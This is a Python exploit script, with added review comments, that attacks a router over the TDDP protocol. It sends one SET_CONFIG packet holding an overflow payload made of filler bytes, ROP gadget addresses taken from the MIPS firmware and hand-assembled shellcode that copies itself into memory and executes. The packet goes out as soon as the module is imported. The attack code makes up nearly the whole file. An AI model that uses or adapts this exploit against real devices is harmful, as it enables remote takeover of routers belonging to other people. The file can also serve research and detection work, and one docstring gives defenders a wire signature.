import socket
import re
import string
from tddp_protocol import TDDPSessionV1
# Target device address; this is the only value handed to Exploit() at the
# bottom of the file.
HOST = "192.168.1.254"
# NOTE(review): PORT is defined but never referenced in this file; presumably
# TDDPSessionV1 carries its own port setting — verify against that class.
PORT = 1040
class Exploit(TDDPSessionV1):
    """TDDP session that builds and sends one crafted SET_CONFIG request.

    The request payload is a fixed byte string: runs of 0x41 ('A') filler,
    4-byte gadget addresses (the ``ROM:`` comments below name the code each
    one points at) and a hand-assembled MIPS shellcode string, terminated by
    a single NUL.  Nothing is computed from the device's response; the packet
    is sent once via ``self.send``.

    For defenders: on the wire this is a single TDDP SET_CONFIG request whose
    payload starts with 0x28 bytes of 0x41 followed by 0x80xxxxxx-range
    addresses, with ``packetLength`` fixed at 0x0264.  Only HOST is used to
    address the device.

    NOTE(review): every literal here is a plain ``str``.  That yields the
    intended 8-bit bytes under Python 2 only; under Python 3 these are text
    strings — confirm which interpreter this file was written for.
    """

    def run(self):
        """Build the crafted SET_CONFIG packet and hand it to ``self.send``.

        Returns:
            Whatever ``self.send`` returns; ``send`` and ``req_buidler`` come
            from TDDPSessionV1 and are not visible in this file.
        """
        c_packet = self.req_buidler.getRequestPacket()
        c_packet['type'] = self.req_buidler.SET_CONFIG

        # ---- gadget addresses (4-byte str literals) ----
        jal_ra = "\xFF\xFC\x7a\x44" # call to address 0x800968fc
        # ROM:800968FC move $v0, $zero
        # ROM:80096900 lw $ra, arg_10($sp)
        # ROM:80096904 jr $ra
        # ROM:80096908 addiu $sp, 0x18
        set_v0 = "\x80\x02\x13\xF8" # ROM:800213F8 lw $ra, arg_1C($sp)
        # ROM:800213FC move $v0, $s0
        # ROM:80021400 lw $s0, arg_18($sp)
        # ROM:80021404 jr $ra
        # ROM:80021408 addiu $sp, 0x20
        test_jal_v0 = "\x80\x01\x3f\x08"  # NOTE: assigned but not used in the payload below
        add_and_jal_v0 = "\x80\x16\x8d\x7c" # ROM:80168D7C move $a1, $sp
        # ROM:80168D80 addiu $a2, $sp, 0x28
        # ROM:80168D84 la $t0, off_802E28B4
        # ROM:80168D8C addu $v0, $t0
        # ROM:80168D90 lw $v0, 0($v0)
        # ROM:80168D94 jalr $v0 (0x800968fc)
        move_a1_a2 = "\x80\x1e\x6f\x88" # ROM:801E6F88 move $a1, $a2
        # ROM:801E6F8C lw $ra, 0x20($sp)
        # ROM:801E6F90 lw $fp, 0x24($sp)
        # ROM:801E6F94 jr $ra
        # ROM:801E6F98 addiu $sp, 0x28
        jalr_s3 = "\x80\x16\x6B\x68"  # NOTE: assigned but not used in the payload below
        strcpy = "\x80\x04\x93\xF8" # ROM:800493F8 move $a0, $s3
        # ROM:800493FC jal strcpy
        # ROM:80049400 move $s1, $zero
        # ROM:80049404 move $v0, $s1
        # ROM:80049408 lw $ra, 0x20($sp)
        # ROM:8004940C lw $s3, 0x1C($sp)
        # ROM:80049410 lw $s2, 0x18($sp)
        # ROM:80049414 lw $s1, 0x14($sp)
        # ROM:80049418 lw $s0, 0x10($sp)
        # ROM:8004941C jr $ra
        # ROM:80049420 addiu $sp, 0x28
        #this is the address where the shellcode will be paste
        dst_shellcode_base = "\x80\x16\xbb\x84"
        invalidate_cache = "\x80\x16\xb9\x10"
        opcode_jalr_s2="\x02\x40\xf8\x09"
        opcode_jalr_fp="\x03\xc0\xf8\x09"
        #this is the address where the shellcode starts to execute
        addr_shellcode = "\x80\x16\xbb\xc4"

        # ---- MIPS instruction strings assembled into `shellcode` ----
        ########################
        move_a0_tddp_socket = "\x3c\x04\x80\x2d\x34\x84\xf9\x24" # la $a0, 802fd924
        move_a0_tddp_socket += "\x8c\x84\xff\xfc" # lw $a0, -4($a0)
        ########################
        ########################
        test_a0 = "\x02\x52\x90\x26" #xor $s2,$s2
        test_a0 += "\x02\x44\x90\x26" #or $s2, $a0
        test_a0 += opcode_jalr_s2
        test_a0 +="\x24\x10\x10\x10" #li $s0, 0x1010 #UNUSED
        ########################
        jalr_invalidate_cache = "\x24\x08\x55\x58" #li $t0,0x5558
        jalr_invalidate_cache += "\x24\x09\x55\x58" #li $t1,0x5558
        jalr_invalidate_cache += "\x3c\x12\x80\x16\x36\x52\xb9\x10" #la $s2, 0x8016b910
        jalr_invalidate_cache += opcode_jalr_s2
        jalr_invalidate_cache +="\x24\x10\x10\x10" #li $s0, 0x1010 #UNUSED
        getpc = "\x0c\x05\x67\x57" #jal 0x80159d5c
        getpc += "\x24\x10\x10\x10" #li $s0, 0x1010 #UNUSED
        move_fp_ra = "\x03\xe0\xf0\x25" #move $fp, $ra
        add_fp = '\x23\xde\x10\x10'
        add_fp += '\x23\xde\xF0\x14'
        get_v0_eq_0_opcode = '\x3c\x13\x80\x11\x36\x73\x89\x18' # la $s3, 0x80118918
        get_v0_eq_0_opcode += '\x8e\x72\xff\xfc' # lw $s2, -4($s3)
        load_v0 = get_v0_eq_0_opcode
        load_v0 += "\x3c\x13\x80\x15\x36\x73\x9c\xd8" #la $s3, 0x80159cd8
        load_v0 += "\xae\x72\xff\xfc" #sw $s2, -4($s3)
        ###########################################################################################
        #load_v0_2 = "\x3c\x12\x24\x02\x36\x52\x10\x10" #li $s2,0x24021010 (opcode: li v0, 0x1010)
        load_v0_2 = get_v0_eq_0_opcode
        load_v0_2 += "\x3c\x13\x80\x15\x36\x73\x9d\x04" #la $s3, 0x80159D04
        load_v0_2 += "\xae\x72\xff\xfc" #sw $s2, -4($s3)
        ###########################################################################################
        # Concatenation order is the execution order of the shellcode pieces.
        shellcode = load_v0
        shellcode += load_v0_2
        shellcode += getpc
        shellcode += move_fp_ra # 4
        shellcode += add_fp # 8
        shellcode += jalr_invalidate_cache #0x18
        #call the filedescriptor (used to verify if it was ok!)
        shellcode += move_a0_tddp_socket
        shellcode += test_a0

        # ---- 0x41 filler between the gadget addresses; each length is fixed ----
        PADDING_0="A" *0x28
        PADDING_1="A" * 0x8
        PADDING_2="A" * 0x20
        PADDING_3="A" * 0x10
        PADDING_4="A" * 0x14
        PADDING_5 = "A"*0x0C
        PADDING_6 = "A" * 0x20
        PADDING_7 = "A" * 0x4

        # Payload layout: filler / address / filler / ... / shellcode / NUL.
        c_packet['payload'] = PADDING_0 + jal_ra + PADDING_1 + dst_shellcode_base + set_v0 + PADDING_2 + add_and_jal_v0 + PADDING_3 + move_a1_a2 + PADDING_4 + opcode_jalr_fp + PADDING_5+ strcpy + addr_shellcode + PADDING_6 + invalidate_cache + addr_shellcode + PADDING_7 + shellcode + "\x00"
        # NOTE(review): the length field is a hard-coded constant rather than
        # derived from len(payload); the two are not checked against each other.
        c_packet['packetLength'] = 0x0264
        return self.send(c_packet)
# Module-level side effect: there is no ``if __name__ == "__main__"`` guard, so
# merely importing this file constructs the session and sends the packet.
s = Exploit(HOST)
s.run()